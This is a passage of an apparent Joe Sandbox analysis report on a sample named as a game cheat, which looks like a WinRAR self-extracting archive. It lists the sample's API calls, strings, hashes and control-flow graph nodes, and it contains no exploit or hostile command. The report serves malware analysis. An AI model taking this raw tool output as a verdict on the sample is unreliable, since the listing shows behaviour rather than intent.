24802 d18dcc _free 20 API calls 24801->24802 24822 d18d24 38 API calls _abort 24801->24822 24823 d1ac31 EnterCriticalSection 24801->24823 24824 d1bbdf LeaveCriticalSection _abort 24801->24824 24802->24801 24804 d14636 __fassign 38 API calls 24803->24804 24805 d1b7cd 24804->24805 24806 d1b7dc GetOEMCP 24805->24806 24807 d1b7ee 24805->24807 24808 d1b805 24806->24808 24807->24808 24809 d1b7f3 GetACP 24807->24809 24808->24781 24808->24782 24809->24808 24811 d1b7bb 40 API calls 24810->24811 24812 d1bc0f 24811->24812 24814 d1bc60 IsValidCodePage 24812->24814 24817 d1bc16 24812->24817 24818 d1bc85 __cftof 24812->24818 24813 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24815 d1ba89 24813->24815 24816 d1bc72 GetCPInfo 24814->24816 24814->24817 24815->24788 24815->24791 24816->24817 24816->24818 24817->24813 24825 d1b893 GetCPInfo 24818->24825 24820->24784 24821->24784 24823->24801 24824->24801 24830 d1b8cd 24825->24830 24834 d1b977 24825->24834 24827 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24829 d1ba23 24827->24829 24829->24817 24835 d1c988 24830->24835 24833 d1ab78 __vswprintf_c_l 43 API calls 24833->24834 24834->24827 24836 d14636 __fassign 38 API calls 24835->24836 24837 d1c9a8 MultiByteToWideChar 24836->24837 24839 d1c9e6 24837->24839 24847 d1ca7e 24837->24847 24841 d18e06 __vswprintf_c_l 21 API calls 24839->24841 24844 d1ca07 __cftof __vsnwprintf_l 24839->24844 24840 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24842 d1b92e 24840->24842 24841->24844 24849 d1ab78 24842->24849 24843 d1ca78 24854 d1abc3 20 API calls _free 24843->24854 24844->24843 24846 d1ca4c MultiByteToWideChar 24844->24846 24846->24843 24848 d1ca68 GetStringTypeW 24846->24848 24847->24840 24848->24843 24850 d14636 __fassign 38 API calls 24849->24850 24851 d1ab8b 24850->24851 24855 d1a95b 24851->24855 24854->24847 24856 d1a976 __vswprintf_c_l 24855->24856 24857 d1a99c MultiByteToWideChar 24856->24857 24858 d1ab50 24857->24858 24859 d1a9c6 24857->24859 24860 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24858->24860 24864 d18e06 __vswprintf_c_l 21 API calls 24859->24864 24866 d1a9e7 __vsnwprintf_l 24859->24866 24861 d1ab63 24860->24861 24861->24833 24862 d1aa30 MultiByteToWideChar 24863 d1aa9c 24862->24863 24865 d1aa49 24862->24865 24891 d1abc3 20 API calls _free 24863->24891 24864->24866 24882 d1af6c 24865->24882 24866->24862 24866->24863 24870 d1aa73 24870->24863 24874 d1af6c __vswprintf_c_l 11 API calls 24870->24874 24871 d1aaab 24872 d18e06 __vswprintf_c_l 21 API calls 24871->24872 24876 d1aacc __vsnwprintf_l 24871->24876 24872->24876 24873 d1ab41 24890 d1abc3 20 API calls _free 24873->24890 24874->24863 24876->24873 24877 d1af6c __vswprintf_c_l 11 API calls 24876->24877 24878 d1ab20 24877->24878 24878->24873 24879 d1ab2f WideCharToMultiByte 24878->24879 24879->24873 24880 d1ab6f 24879->24880 24892 d1abc3 20 API calls _free 24880->24892 24883 d1ac98 _abort 5 API calls 24882->24883 24884 d1af93 24883->24884 24887 d1af9c 24884->24887 24893 d1aff4 10 API calls 3 library calls 24884->24893 24886 d1afdc LCMapStringW 24886->24887 24888 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24887->24888 24889 d1aa60 24888->24889 24889->24863 24889->24870 24889->24871 24890->24863 24891->24858 24892->24863 24893->24886 25416 d0c793 107 API calls 4 library calls 25417 cf1075 84 API calls 24894 cf9a74 24898 cf9a7e 24894->24898 24895 cf9ab1 24896 cf9b9d SetFilePointer 24896->24895 24897 cf9bb6 GetLastError 24896->24897 24897->24895 24898->24895 24898->24896 24899 cf981a 79 API calls 24898->24899 24900 cf9b79 24898->24900 24899->24900 24900->24896 25464 cf1f72 128 API calls __EH_prolog 25465 d17f6e 52 API calls 2 library calls 25466 d0ad10 73 API calls 25420 d0a400 GdipDisposeImage GdipFree 25421 d0d600 70 API calls 25422 d16000 QueryPerformanceFrequency QueryPerformanceCounter 25424 d1f200 51 API calls 25470 d12900 6 API calls 4 library calls 25472 d1a700 21 API calls 25473 cf1710 86 API calls 25474 d0f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25475 d0ff30 LocalFree 25426 d1c030 GetProcessHeap 25427 cf1025 29 API calls 25428 d1f421 21 API calls __vswprintf_c_l 25429 d0c220 93 API calls _swprintf

                                                    Executed Functions

                                                    Function 00D0DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00D00863: GetModuleHandleW.KERNEL32(kernel32), ref: 00D0087C
                                                      • Part of subcall function 00D00863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D0088E
                                                      • Part of subcall function 00D00863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D008BF
                                                      • Part of subcall function 00D0A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D0A655
                                                      • Part of subcall function 00D0AC16: OleInitialize.OLE32(00000000), ref: 00D0AC2F
                                                      • Part of subcall function 00D0AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D0AC66
                                                      • Part of subcall function 00D0AC16: SHGetMalloc.SHELL32(00D38438), ref: 00D0AC70
                                                    • GetCommandLineW.KERNEL32 ref: 00D0DF5C
                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D0DF83
                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D0DF94
                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00D0DFCE
                                                      • Part of subcall function 00D0DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D0DBF4
                                                      • Part of subcall function 00D0DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D0DC30
                                                    • CloseHandle.KERNEL32(00000000), ref: 00D0DFD7
                                                    • GetModuleFileNameW.KERNEL32(00000000,00D4EC90,00000800), ref: 00D0DFF2
                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,00D4EC90), ref: 00D0DFFE
                                                    • GetLocalTime.KERNEL32(?), ref: 00D0E009
                                                    • _swprintf.LIBCMT ref: 00D0E048
                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D0E05A
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00D0E061
                                                    • LoadIconW.USER32(00000000,00000064), ref: 00D0E078
                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00D0E0C9
                                                    • Sleep.KERNEL32(?), ref: 00D0E0F7
                                                    • DeleteObject.GDI32 ref: 00D0E130
                                                    • DeleteObject.GDI32(?), ref: 00D0E140
                                                    • CloseHandle.KERNEL32 ref: 00D0E183
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                    • API String ID: 3049964643-433059772
                                                    • Opcode ID: 30a46cb1c9859a9d58334385c9e62782e76922ab652db89b62b082d1f925f810
                                                    • Instruction ID: 0b58b7b309f6c0bd9471b522c5fd14a704aad6c018da68e13e0f3e4bfec8670b
                                                    • Opcode Fuzzy Hash: 30a46cb1c9859a9d58334385c9e62782e76922ab652db89b62b082d1f925f810
                                                    • Instruction Fuzzy Hash: 2C61DF75904345AFD320AFA4EC89F2B7BADEB55704F04082AF949D23E1DB789948C772
                                                    Function 00D0A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 812 d0a6c2-d0a6df FindResourceW 813 d0a6e5-d0a6f6 SizeofResource 812->813 814 d0a7db 812->814 813->814 816 d0a6fc-d0a70b LoadResource 813->816 815 d0a7dd-d0a7e1 814->815 816->814 817 d0a711-d0a71c LockResource 816->817 817->814 818 d0a722-d0a737 GlobalAlloc 817->818 819 d0a7d3-d0a7d9 818->819 820 d0a73d-d0a746 GlobalLock 818->820 819->815 821 d0a7cc-d0a7cd GlobalFree 820->821 822 d0a74c-d0a76a call d10320 CreateStreamOnHGlobal 820->822 821->819 825 d0a7c5-d0a7c6 GlobalUnlock 822->825 826 d0a76c-d0a78e call d0a626 822->826 825->821 826->825 831 d0a790-d0a798 826->831 832 d0a7b3-d0a7c1 831->832 833 d0a79a-d0a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 d0a7b0 833->834 834->832
                                                    APIs
                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D0B73D,00000066), ref: 00D0A6D5
                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A6EC
                                                    • LoadResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A703
                                                    • LockResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A712
                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D0B73D,00000066), ref: 00D0A72D
                                                    • GlobalLock.KERNEL32(00000000), ref: 00D0A73E
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D0A762
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00D0A7C6
                                                      • Part of subcall function 00D0A626: GdipAlloc.GDIPLUS(00000010), ref: 00D0A62C
                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D0A7A7
                                                    • GlobalFree.KERNEL32(00000000), ref: 00D0A7CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                    • String ID: PNG
                                                    • API String ID: 211097158-364855578
                                                    • Opcode ID: 4263274053acefcaa2d57f6850c06bcb2356367bda1de7d031438a679194a297
                                                    • Instruction ID: e155950fe44939d81a9d1094cf8ef1c07793dd7e61a3c8c2021a1c2b4575742f
                                                    • Opcode Fuzzy Hash: 4263274053acefcaa2d57f6850c06bcb2356367bda1de7d031438a679194a297
                                                    • Instruction Fuzzy Hash: 6E31C275600712BFC7219F25EC88E2BBBB9EF84761B054519F809C23A0EB31DC55CAB1
                                                    Function 00CFA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1025 cfa69b-cfa6bf call d0ec50 1028 cfa727-cfa730 FindNextFileW 1025->1028 1029 cfa6c1-cfa6ce FindFirstFileW 1025->1029 1030 cfa742-cfa7ff call d00602 call cfc310 call d015da * 3 1028->1030 1032 cfa732-cfa740 GetLastError 1028->1032 1029->1030 1031 cfa6d0-cfa6e2 call cfbb03 1029->1031 1038 cfa804-cfa811 1030->1038 1040 cfa6fe-cfa707 GetLastError 1031->1040 1041 cfa6e4-cfa6fc FindFirstFileW 1031->1041 1033 cfa719-cfa722 1032->1033 1033->1038 1043 cfa709-cfa70c 1040->1043 1044 cfa717 1040->1044 1041->1030 1041->1040 1043->1044 1046 cfa70e-cfa711 1043->1046 1044->1033 1046->1044 1048 cfa713-cfa715 1046->1048 1048->1033
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6C4
                                                      • Part of subcall function 00CFBB03: _wcslen.LIBCMT ref: 00CFBB27
                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6F2
                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6FE
                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA728
                                                    • GetLastError.KERNEL32(?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA734
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                    • String ID:
                                                    • API String ID: 42610566-0
                                                    • Opcode ID: dcbe0dc810024494748f1a40342895f0588bc8a9f0bc39edf511ca11aee3362a
                                                    • Instruction ID: 96192b8cc95c8736822821ba7e3194e4bed6fa96fe98aea2052d7401c7477685
                                                    • Opcode Fuzzy Hash: dcbe0dc810024494748f1a40342895f0588bc8a9f0bc39edf511ca11aee3362a
                                                    • Instruction Fuzzy Hash: 4A418276900519ABCB25EF64CC88AE9F7B8FB48350F104196FA6DD3240D7346E94CFA1
                                                    Function 00D17DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,?,00D17DC4,00000000,00D2C300,0000000C,00D17F1B,00000000,00000002,00000000), ref: 00D17E0F
                                                    • TerminateProcess.KERNEL32(00000000,?,00D17DC4,00000000,00D2C300,0000000C,00D17F1B,00000000,00000002,00000000), ref: 00D17E16
                                                    • ExitProcess.KERNEL32 ref: 00D17E28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 682075f74670d14e6eb4e19220f581c94ff85b252626275532e0388533f3a709
                                                    • Instruction ID: 5df271dc8e609e9bdf81732e76a9a52c26df1d87795e0ec20983c910ea81c7f0
                                                    • Opcode Fuzzy Hash: 682075f74670d14e6eb4e19220f581c94ff85b252626275532e0388533f3a709
                                                    • Instruction Fuzzy Hash: 9CE0BF31004244BBCF116F54ED0A9897FB9EB54751B044454F815CA232CF39DEA2CBB4
                                                    Function 00CF848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 9da9d51393dea4a2a567081e6433d22149a28a36437eaff13e63da2bb4309cf1
                                                    • Instruction ID: f6a62e15935cb6b139a200dd0c0f60faed585e33827b5ecc5fb93af77dbf821a
                                                    • Opcode Fuzzy Hash: 9da9d51393dea4a2a567081e6433d22149a28a36437eaff13e63da2bb4309cf1
                                                    • Instruction Fuzzy Hash: 2A821C7190414DAFDF55DF64C891BFABB79AF05300F0841B9EA599B282CB315B8CCB62
                                                    Function 00D0B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00D0B7E5
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0B8D1
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B8EF
                                                    • IsDialogMessageW.USER32(?,?), ref: 00D0B902
                                                    • TranslateMessage.USER32(?), ref: 00D0B910
                                                    • DispatchMessageW.USER32(?), ref: 00D0B91A
                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00D0B93D
                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00D0B960
                                                    • GetDlgItem.USER32(?,00000068), ref: 00D0B983
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D0B99E
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00D235F4), ref: 00D0B9B1
                                                      • Part of subcall function 00D0D453: _wcslen.LIBCMT ref: 00D0D47D
                                                    • SetFocus.USER32(00000000), ref: 00D0B9B8
                                                    • _swprintf.LIBCMT ref: 00D0BA24
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                      • Part of subcall function 00D0D4D4: GetDlgItem.USER32(00000068,00D4FCB8), ref: 00D0D4E8
                                                      • Part of subcall function 00D0D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00D0AF07,00000001,?,?,00D0B7B9,00D2506C,00D4FCB8,00D4FCB8,00001000,00000000,00000000), ref: 00D0D510
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D0D51B
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D235F4), ref: 00D0D529
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D0D53F
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D0D559
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D0D59D
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D0D5AB
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D0D5BA
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D0D5E1
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D243F4), ref: 00D0D5F0
                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00D0BA68
                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00D0BA90
                                                    • GetTickCount.KERNEL32 ref: 00D0BAAE
                                                    • _swprintf.LIBCMT ref: 00D0BAC2
                                                    • GetLastError.KERNEL32(?,00000011), ref: 00D0BAF4
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00D0BB43
                                                    • _swprintf.LIBCMT ref: 00D0BB7C
                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00D0BBD0
                                                    • GetCommandLineW.KERNEL32 ref: 00D0BBEA
                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00D0BC47
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00D0BC6F
                                                    • Sleep.KERNEL32(00000064), ref: 00D0BCB9
                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00D0BCE2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00D0BCEB
                                                    • _swprintf.LIBCMT ref: 00D0BD1E
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0BD7D
                                                    • SetDlgItemTextW.USER32(?,00000065,00D235F4), ref: 00D0BD94
                                                    • GetDlgItem.USER32(?,00000065), ref: 00D0BD9D
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00D0BDAC
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D0BDBB
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0BE68
                                                    • _wcslen.LIBCMT ref: 00D0BEBE
                                                    • _swprintf.LIBCMT ref: 00D0BEE8
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D0BF32
                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00D0BF4C
                                                    • GetDlgItem.USER32(?,00000068), ref: 00D0BF55
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00D0BF6B
                                                    • GetDlgItem.USER32(?,00000066), ref: 00D0BF85
                                                    • SetWindowTextW.USER32(00000000,00D3A472), ref: 00D0BFA7
                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00D0C007
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0C01A
                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00D0C0BD
                                                    • EnableWindow.USER32(00000000,00000000), ref: 00D0C197
                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00D0C1D9
                                                      • Part of subcall function 00D0C73F: __EH_prolog.LIBCMT ref: 00D0C744
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0C1FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                    • API String ID: 3445078344-2608530638
                                                    • Opcode ID: f223bb3c377e4e66ce50d8d7733035cfdc4e78487e75b979c42481519629e952
                                                    • Instruction ID: ae93bf908d29dac2731fa45822620d8cfb0e4d5c8bac3cb7be630dc8fdda59a1
                                                    • Opcode Fuzzy Hash: f223bb3c377e4e66ce50d8d7733035cfdc4e78487e75b979c42481519629e952
                                                    • Instruction Fuzzy Hash: 28420570D44348BEEB219BB49C4AFBE7B6CAB11710F044155F648E62E2CB759A44DB32
                                                    Function 00D00863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 268 d00863-d00886 call d0ec50 GetModuleHandleW 271 d008e7-d00b48 268->271 272 d00888-d0089f GetProcAddress 268->272 273 d00c14-d00c40 GetModuleFileNameW call cfc29a call d00602 271->273 274 d00b4e-d00b59 call d175fb 271->274 275 d008a1-d008b7 272->275 276 d008b9-d008c9 GetProcAddress 272->276 291 d00c42-d00c4e call cfb146 273->291 274->273 285 d00b5f-d00b8d GetModuleFileNameW CreateFileW 274->285 275->276 279 d008e5 276->279 280 d008cb-d008e0 276->280 279->271 280->279 288 d00c08-d00c0f CloseHandle 285->288 289 d00b8f-d00b9b SetFilePointer 285->289 288->273 289->288 292 d00b9d-d00bb9 ReadFile 289->292 297 d00c50-d00c5b call d0081b 291->297 298 d00c7d-d00ca4 call cfc310 GetFileAttributesW 291->298 292->288 294 d00bbb-d00be0 292->294 296 d00bfd-d00c06 call d00371 294->296 296->288 303 d00be2-d00bfc call d0081b 296->303 297->298 309 d00c5d-d00c7b CompareStringW 297->309 306 d00ca6-d00caa 298->306 307 d00cae 298->307 303->296 306->291 310 d00cac 306->310 311 d00cb0-d00cb5 307->311 309->298 309->306 310->311 313 d00cb7 311->313 314 d00cec-d00cee 311->314 315 d00cb9-d00ce0 call cfc310 GetFileAttributesW 313->315 316 d00cf4-d00d0b call cfc2e4 call cfb146 314->316 317 d00dfb-d00e05 314->317 322 d00ce2-d00ce6 315->322 323 d00cea 315->323 327 d00d73-d00da6 call cf4092 AllocConsole 316->327 328 d00d0d-d00d6e call d0081b * 2 call cfe617 call cf4092 call cfe617 call d0a7e4 316->328 322->315 326 d00ce8 322->326 323->314 326->314 333 